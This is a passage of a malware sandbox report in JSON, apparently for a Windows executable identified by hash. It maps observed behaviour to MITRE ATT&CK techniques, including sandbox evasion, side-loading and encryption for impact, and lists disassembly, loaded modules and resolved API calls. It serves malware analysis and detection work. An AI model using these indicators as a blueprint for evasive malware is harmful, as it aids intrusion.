"https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "suspicious_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465\" file has an entrypoint instructions - \"call\t0x402bca,jmp\t0x40236d,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x43c0d0],push\tdword ptr [ebp + 8],call\tdword ptr [0x43c0cc],push\t0xc0000409,call\tdword ptr [0x43c0d4],push\teax,call\tdword ptr [0x43c0d8],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x435744,test\teax, eax,je\t0x40254e,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x44cae8], eax,mov\tdword ptr [0x44cae4], ecx,mov\tdword ptr [0x44cae0], edx,mov\tdword ptr [0x44cadc], ebx,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 713c0000\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" loaded module \"KERNEL32\" at base 75100000\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ccc0000\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" loaded module \"RPCRT4.DLL\" at base 76d80000\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" loaded module \"NTDLL.DLL\" at base 76e30000\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" loaded module \"KERNEL32.DLL\" at base 75100000\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" loaded module \"OLEAUT32.DLL\" at base 767a0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00006088)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76D80000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465\" has flags like IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter ZwCreateSection (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter ZwMapViewOfSection (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter ZwUnmapViewOfSection (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter RtlNtStatusToDosError (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter ZwClose (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter ZwQueryInformationToken (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter ZwOpenProcess (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter ZwOpenProcessToken (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter _snwprintf (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter memcpy (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter strcpy (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter sprintf (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter mbstowcs (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter _snprintf (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter wcstombs (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter memset (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter _aulldiv (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter _allmul (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter _aullrem (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter RtlUnwind (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter NtQueryVirtualMemory (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter RaiseException (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter SetEvent (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter HeapDestroy (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter HeapCreate (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter SwitchToThread (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter SetWaitableTimer (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter Process32First (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter SleepEx (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter Process32Next (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter WaitForMultipleObjects (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter CreateWaitableTimerA (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter ResetEvent (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter lstrcmpW (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called 